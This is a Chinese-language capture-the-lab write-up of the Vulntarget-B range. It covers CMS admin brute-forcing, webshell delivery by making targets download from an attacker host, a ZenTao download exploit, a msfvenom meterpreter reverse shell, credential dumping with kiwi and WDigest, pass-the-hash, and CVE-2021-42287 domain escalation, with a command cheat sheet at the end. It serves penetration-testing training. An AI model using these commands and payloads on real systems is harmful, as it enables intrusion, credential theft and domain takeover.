vulntarget-B打靶记录
字数 1805 2025-08-22 18:37:14
Vulntarget-B 靶场渗透测试完整教学文档
0x00 靶场概述
Vulntarget-B 是一个模拟企业内网环境的渗透测试靶场,包含 CentOS 7、Windows 10 和 Windows Server 2016 三台主机,涉及多种漏洞利用和横向移动技术。
0x01 CentOS 7 渗透
1.1 信息搜集
-
端口扫描:
- 使用 fscan 进行扫描:
./fscan -h 192.168.239.111 - 发现 SSH 弱密码(但选择走正常渗透流程)
- 发现 81 端口运行极致 CMS
- 使用 fscan 进行扫描:
-
Web 服务识别:
- 公网 IP 访问显示宝塔面板(8888/888 端口无有效利用点)
- 81 端口为极致 CMS
1.2 极致 CMS 漏洞利用
-
后台登录爆破:
- 路径:
/admin.php/Plugins/update.html需要登录 - 发现验证码复用漏洞
- 爆破成功:
admin/admin123
- 路径:
-
文件上传漏洞利用:
- 准备 webshell (a.php) 并压缩为 1.zip(密码:1)
- 利用极致 CMS 插件更新功能实现远程文件下载:
POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.239.111:81 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=start-download&filepath=dbrestore&download_url=http://192.168.239.130:8000/1.zip - 访问 webshell:
A/exts/a.php
-
蚁剑连接:
- 发现 disable_functions 限制
- 使用蚁剑插件绕过限制
1.3 权限提升
-
获取交互式 shell:
- 使用 Python 获取完整终端:
python -c 'import pty; pty.spawn("/bin/bash")' - 无 Python 时替代方案:
/usr/bin/script -qc /bin/bash /dev/null
- 使用 Python 获取完整终端:
-
内网探测:
- 上传 fscan 进行内网扫描:
./fscan -h 10.0.20.0/24 > 1.txt - 发现 10.0.20.66:8080(禅道 CMS)
- 上传 fscan 进行内网扫描:
-
端口转发:
- 使用 4dnat 工具将内网 8080 转发到本地 7777:
./4dnat -forward 7777 10.0.20.66:8080
- 使用 4dnat 工具将内网 8080 转发到本地 7777:
0x02 Windows 10 渗透
2.1 禅道 CMS 漏洞利用
-
信息收集:
- 访问
192.168.239.111:7777发现禅道 12.4.2 - 通过源码泄露获取测试账号:
admin/Admin123
- 访问
-
CNVD-2020-121325 漏洞利用:
- 构造恶意下载链接(base64 编码):
http://192.168.239.111:7777/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA== - 访问 webshell:
http://192.168.239.111:7777/data/client/1/1.php
- 构造恶意下载链接(base64 编码):
-
域信息收集:
- 发现域:
vulntarget.com - 域控主机:
WIN-UH20PRD3EAO - 域控 IP:
10.0.10.100
- 发现域:
2.2 免杀与权限维持
-
杀软识别:
- 确认安装火绒杀毒软件
-
免杀 payload 生成:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=11001 -f exe > rw10.exe -
Meterpreter 会话配置:
set payload windows/x64/meterpreter/reverse_tcp set lhost 10.0.20.30 set lport 11001 set autorunscript migrate -n explorer.exe set ExitOnSession false run -j -z
0x03 Windows Server 2016 域控渗透
3.1 凭证获取
-
Hash 抓取:
- 使用 kiwi 模块获取 NTLM hash:
load kiwi creds_all
- 使用 kiwi 模块获取 NTLM hash:
-
明文密码获取:
- 修改注册表启用 WDigest 明文存储:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- 修改注册表启用 WDigest 明文存储:
3.2 横向移动技术
-
PTH 攻击尝试:
- 使用 psexec 和 wmiexec 进行传递哈希攻击:
proxychains python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 ./Administrator@10.0.10.100
- 使用 psexec 和 wmiexec 进行传递哈希攻击:
-
CVE-2021-42287 漏洞利用:
- 使用 sam_the_admin.py 进行域权限提升:
proxychains python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell
- 使用 sam_the_admin.py 进行域权限提升:
0x04 总结与问题
-
扫描问题:
- fscan 和 nmap 未扫描出 Win10 主机(原因未明)
-
复杂网络转发问题:
- 尝试多层端口转发未成功:
win2016 -> win10:8000 -> centos:8000 -> kali:8000
- 尝试多层端口转发未成功:
-
横向移动技巧:
- 多种横向移动方法尝试(PTH、漏洞利用等)
附录:关键命令速查
| 用途 | 命令 |
|---|---|
| 极致 CMS 文件下载 | action=start-download&filepath=dbrestore&download_url=http://attacker/1.zip |
| 端口转发 | ./4dnat -forward 7777 10.0.20.66:8080 |
| 禅道漏洞利用 | index.php?m=client&f=download&version=1&link=BASE64_URL |
| 免杀 payload | msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP -f exe > rw10.exe |
| 域提权 | python3 sam_the_admin.py domain/user:pass -dc-ip IP -shell |
本教学文档涵盖了 Vulntarget-B 靶场渗透的全过程,包括信息收集、漏洞利用、权限提升和横向移动等关键环节,可作为内网渗透测试的参考指南。